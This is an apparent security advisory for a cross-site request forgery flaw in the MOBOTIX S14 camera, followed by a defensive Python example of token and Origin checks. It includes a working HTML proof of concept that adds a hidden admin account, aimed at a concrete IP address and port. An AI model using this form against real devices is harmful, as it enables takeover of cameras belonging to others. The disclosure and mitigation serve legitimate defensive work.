Summary
The MOBOTIX S14 Camera did not implement any mechanism to avoid cross-site request forgery (CSRF) attacks.
Impact
Successful exploitation of this vulnerability can lead to the takeover of the device.
Details
The MOBOTIX S14 Camera did not implement any mechanism to avoid cross-site request forgery attacks.
This allows a local account password to be changed without the knowledge of the authenticated user.
PoC - the following proof of concept adds a user named 'test' with a password of 'aaaaa'. Note that this user has admin privileges.
<html>
<body>
<!-- The form posts to the camera's account-management endpoint; the request carries no anti-CSRF token, so the browser's stored session is all the endpoint checks. -->
<form method="POST" action="http://82.71.22.180:8001/admin/access">
<input type="hidden" name="user_name_0" value="admin"/>
<input type="hidden" name="user_group_0" value="admins"/>
<input type="hidden" name="user_passwd_a_0" value="***"/>
<input type="hidden" name="user_passwd_b_0" value="***"/>
<input type="hidden" name="user_name_1" value="rayspeed"/>
<input type="hidden" name="user_group_1" value="users"/>
<input type="hidden" name="user_passwd_a_1" value="***"/>
<input type="hidden" name="user_passwd_b_1" value="***"/>
<!-- Third row: the new 'test' account placed in the admins group -->
<input type="hidden" name="user_name_2" value="test"/>
<input type="hidden" name="user_group_2" value="admins"/>
<input type="hidden" name="user_passwd_a_2" value="aaaaa"/>
<input type="hidden" name="user_passwd_b_2" value="aaaaa"/>
<input type="hidden" name="sv_passwd_a" value=""/>
<input type="hidden" name="sv_passwd_b" value=""/>
<input type="hidden" name="save_config" value="Set"/>
<input type="submit" value="Submit"/>
</form>
</body>
</html>
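The root cause described above is that the account-management endpoint accepts any POST the victim's browser sends, with nothing tying the request to a page the camera itself served. The following is an added example, not MOBOTIX firmware code, of the server-side check that closes this gap: a per-session synchronizer token that legitimate forms must echo back, combined with Origin/Referer validation. The site origin (`http://camera.example`), the protected path list and the shape of the two constructed requests are assumptions; the form field names in the forged request mirror the PoC above.

```python
import hmac
import secrets
from typing import Mapping, Optional
from urllib.parse import urlsplit

# Assumed values for the example: the endpoint targeted by the PoC and the
# origin the camera's own web UI would be served from (hypothetical).
PROTECTED_PATHS = {"/admin/access"}
SITE_ORIGIN = "http://camera.example"


def new_csrf_token() -> str:
    """Mint an unguessable per-session token to embed in the camera's own forms."""
    return secrets.token_urlsafe(32)


def origin_allowed(headers: Mapping[str, str], site_origin: str) -> bool:
    """Reject requests whose Origin (or, failing that, Referer) is not the site itself.

    Browsers attach Origin to cross-site form POSTs, so a form hosted on a third-party
    page arrives with a foreign origin that the handler can refuse outright.
    """
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False  # no provenance at all: treat as cross-site
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin.lower() == site_origin.lower()


def token_valid(form: Mapping[str, str], session_token: Optional[str]) -> bool:
    """Synchronizer-token check: the submitted form must echo the token bound to the session."""
    submitted = form.get("csrf_token", "")
    if not session_token or not submitted:
        return False
    # Constant-time comparison so a wrong token is not distinguishable by timing.
    return hmac.compare_digest(submitted, session_token)


def authorize_state_change(method: str, path: str, headers: Mapping[str, str],
                           form: Mapping[str, str], session_token: Optional[str],
                           site_origin: str = SITE_ORIGIN) -> bool:
    """Allow a POST to a protected path only if both the origin and the token check pass.

    Requests that are not state-changing admin operations fall through to the
    normal authentication/authorization logic (not modelled here).
    """
    if path not in PROTECTED_PATHS or method.upper() != "POST":
        return True
    return origin_allowed(headers, site_origin) and token_valid(form, session_token)


def demo():
    """Run the check against a forged and a genuine request; returns (forged_ok, genuine_ok)."""
    session_token = new_csrf_token()
    # Constructed request shaped like the PoC: submitted from an attacker-hosted page,
    # so the browser sends a foreign Origin and the form carries no token.
    forged = {
        "method": "POST", "path": "/admin/access",
        "headers": {"Origin": "http://attacker.example", "Cookie": "session=victim"},
        "form": {"user_name_2": "test", "user_group_2": "admins",
                 "user_passwd_a_2": "aaaaa", "user_passwd_b_2": "aaaaa",
                 "save_config": "Set"},
    }
    # Constructed legitimate request: same origin, and the form echoes the session's token.
    genuine = {
        "method": "POST", "path": "/admin/access",
        "headers": {"Origin": SITE_ORIGIN, "Cookie": "session=victim"},
        "form": {"user_name_2": "test", "user_group_2": "admins",
                 "user_passwd_a_2": "aaaaa", "user_passwd_b_2": "aaaaa",
                 "save_config": "Set", "csrf_token": session_token},
    }
    return (authorize_state_change(**forged, session_token=session_token),
            authorize_state_change(**genuine, session_token=session_token))


if __name__ == "__main__":
    print(demo())
```

Either check alone stops the PoC as written; keeping both means a missing Origin header (some privacy settings strip it) still falls back to the token, and a leaked or predictable token is still caught by the origin comparison.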